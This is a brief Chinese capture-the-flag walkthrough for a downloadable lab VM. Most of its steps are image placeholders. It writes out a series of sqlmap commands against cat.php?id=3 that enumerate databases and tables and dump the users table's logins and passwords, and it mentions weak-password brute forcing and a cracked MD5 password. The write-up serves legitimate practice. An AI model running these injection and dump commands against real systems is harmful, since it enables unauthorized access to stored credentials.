CTF實戰_006

靶機環境
鏈接:https://pan.baidu.com/s/11_3AMv3AtgKLqprwR3IkWg 提取碼:5c7m
攻擊機 IP 192.168.124.149
靶機 IP 192.168.124.148
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
嘗試弱口令爆破……

使用web漏洞掃描工具
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述在這裏插入圖片描述

sqlmap -u "http://192.168.124.148/cat.php?id=3"  #檢查是否存在sql注入
sqlmap -u "http://192.168.124.148/cat.php?id=3" --dbs  #查看存在庫
sqlmap -u "http://192.168.124.148/cat.php?id=3" "photoblog" --tables #查看庫中的表
sqlmap -u "http://192.168.124.148/cat.php?id=3" "photoblog" -T "users" --columns  #查看錶中字段
sqlmap -u "http://192.168.124.148/cat.php?id=3" "photoblog" -T "users" -C "login,password" --dump  #查看字段的值

在這裏插入圖片描述
因爲密碼簡單 sqlmap 將MD5破解出來了括號裏就是 P4ssw0rd
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章